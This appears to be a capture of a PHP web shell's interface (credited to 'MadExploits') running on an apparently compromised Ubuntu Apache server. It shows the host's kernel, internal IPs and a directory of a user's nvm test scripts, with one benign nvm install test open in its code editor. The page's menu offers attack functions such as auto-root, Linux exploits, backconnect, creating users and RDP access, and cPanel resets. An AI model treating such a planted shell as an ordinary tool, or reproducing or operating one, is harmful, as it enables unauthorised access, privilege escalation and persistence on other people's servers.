Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ayush23027 /
.nvm /
test /
installation_node /
[ HOME SHELL ]
Name
Size
Permission
Action
default-packages
2.6
KB
-rwxr-xr-x
install LTS
1.26
KB
-rwxr-xr-x
install already installed uses...
705
B
-rwxr-xr-x
install from binary
678
B
-rwxr-xr-x
install from binary with binar...
1.33
KB
-rw-r--r--
install from source
834
B
-rwxr-xr-x
install from source with threa...
950
B
-rwxr-xr-x
install from source without V8...
762
B
-rwxr-xr-x
install hook
1.37
KB
-rwxr-xr-x
install latest npm
2.38
KB
-rwxr-xr-x
install on bash with ERR trap ...
1005
B
-rwxr-xr-x
install two versions and use t...
682
B
-rwxr-xr-x
install version specified in ....
510
B
-rwxr-xr-x
install while reinstalling pac...
1.53
KB
-rwxr-xr-x
install with --alias
244
B
-rwxr-xr-x
install with --default
251
B
-rwxr-xr-x
install with --latest-npm
269
B
-rwxr-xr-x
setup_dir
62
B
-rwxr-xr-x
teardown_dir
268
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : default-packages
#!/bin/sh FILE="$NVM_DIR/default-packages" die () { echo "$@" ; cleanup ; exit 1; } setup () { if [ -f $FILE ]; then ORIG_DEFAULT_PACKAGES=$(cat $FILE) mkdir ./tmp/ ||: mv $FILE ./tmp/default-packages ||: fi touch $FILE } cleanup () { rm -rf "$(nvm_version_path v6.10.1)" $FILE if [ "$ORIG_DEFAULT_PACKAGES" != "" ]; then rm -rf ./tmp/ echo "$ORIG_DEFAULT_PACKAGES" > $FILE fi } setup \. ../../nvm.sh cat > $FILE << EOF rimraf object-inspect@1.0.2 # commented-package stevemao/left-pad daytime EOF printf %s "$(cat "${FILE}")" > $FILE # strip trailing newline nvm install v6.10.1 2>&1 EXIT_CODE=$? [ "_$EXIT_CODE" = "_0" ] || die "expected 'nvm install v6.10.1' to exit with 0, got $EXIT_CODE" nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'rimraf' if [ -z "$?" ]; then die "expected 'nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'rimraf'' to exit with 0, got $?" fi nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'daytime' if [ -z "$?" ]; then die "expected 'nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'daytime'' to exit with 0, got $?" fi cleanup setup \. ../../nvm.sh cat > $FILE << EOF rimraf object-inspect@1.0.2 # commented-package stevemao/left-pad EOF nvm install v6.10.1 --skip-default-packages 2>&1 EXIT_CODE=$? [ "_$EXIT_CODE" = "_0" ] || die "expected 'nvm install v6.10.1' to exit with 0, got $EXIT_CODE" if nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'rimraf'; then die "expected 'nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'rimraf'' to be empty" fi cleanup setup cat > $FILE << EOF not~a~package~name EOF nvm install v6.10.1 EXIT_CODE=$? [ "_$EXIT_CODE" = "_0" ] || die "expected 'nvm install v6.10.1' to exit with 0, got $EXIT_CODE" if nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'not~a~package~name'; then die "expected 'nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'not~a~package~name'' to exit with 1, got $?" fi cleanup setup cat > $FILE << EOF object-inspect @ 1.0.2 EOF nvm install v6.10.1 2>&1 EXIT_CODE=$? [ "_$EXIT_CODE" = "_1" ] || die "expected 'nvm install v6.10.1' to exit with 1, got $EXIT_CODE" if nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'object-inspect'; then die "expected 'nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'object-inspect'' to exit with 1, got $?" fi cleanup setup rm -rf $FILE nvm install v6.10.1 2>&1 EXIT_CODE=$? [ "_$EXIT_CODE" = "_0" ] || die "expected 'nvm install v6.10.1' to exit with 0, got $EXIT_CODE" if nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'object-inspect'; then die "expected 'nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'object-inspect'' to exit with 1, got $?" fi touch $FILE cleanup
Close